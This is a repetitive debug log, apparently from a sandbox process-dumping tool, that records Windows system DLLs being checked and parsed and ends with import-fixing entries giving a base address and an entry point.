2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,693 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,709 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,724 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,740 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,756 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,770 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,770 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,770 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,786 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,802 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,818 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,834 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,848 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,865 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,881 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,895 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,911 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,927 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,943 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,959 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,959 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,959 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,959 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,973 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:38,990 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,005 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,005 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,020 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,020 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,020 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,020 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,036 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,052 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,068 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,082 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,098 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,115 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,130 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,130 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,130 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,130 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,145 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,161 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,177 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,193 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,207 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,223 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,239 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,239 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,239 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,255 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,270 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,286 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,302 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,316 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,316 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,316 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,316 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,332 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,332 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,332 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,348 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,364 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,380 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,380 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cfgmgr32.dll
2020-03-24 10:16:39,394 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:39,394 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\devobj.dll
2020-03-24 10:16:39,411 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:39,411 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mpr.dll
2020-03-24 10:16:39,427 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:39,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:16:39,427 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:16:39,427 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:39,441 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msctf.dll
2020-03-24 10:16:39,441 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:39,441 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcp60.dll
2020-03-24 10:16:39,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,457 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,473 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:16:39,489 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:39,489 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:16:39,489 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:39,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:16:39,505 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:39,505 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
2020-03-24 10:16:39,519 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:39,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\mswsock.dll
2020-03-24 10:16:39,519 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:39,519 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\WSHTCPIP.DLL
2020-03-24 10:16:39,536 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:39,536 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nlaapi.dll
2020-03-24 10:16:39,551 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:39,551 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\NapiNSP.dll
2020-03-24 10:16:39,551 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:39,551 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\pnrpnsp.dll
2020-03-24 10:16:39,566 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:39,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\dnsapi.dll
2020-03-24 10:16:39,582 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:39,582 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winrnr.dll
2020-03-24 10:16:39,582 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:39,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\IPHLPAPI.DLL
2020-03-24 10:16:39,598 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:39,598 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\winnsi.dll
2020-03-24 10:16:39,614 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:39,614 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rasadhlp.dll
2020-03-24 10:16:39,614 [root] DEBUG: DumpProcessFixImports: Instantiating PeParser with address: 0x00430000
2020-03-24 10:16:39,628 [root] DEBUG: DumpProcessFixImports: Module entry point VA is 0x00453020
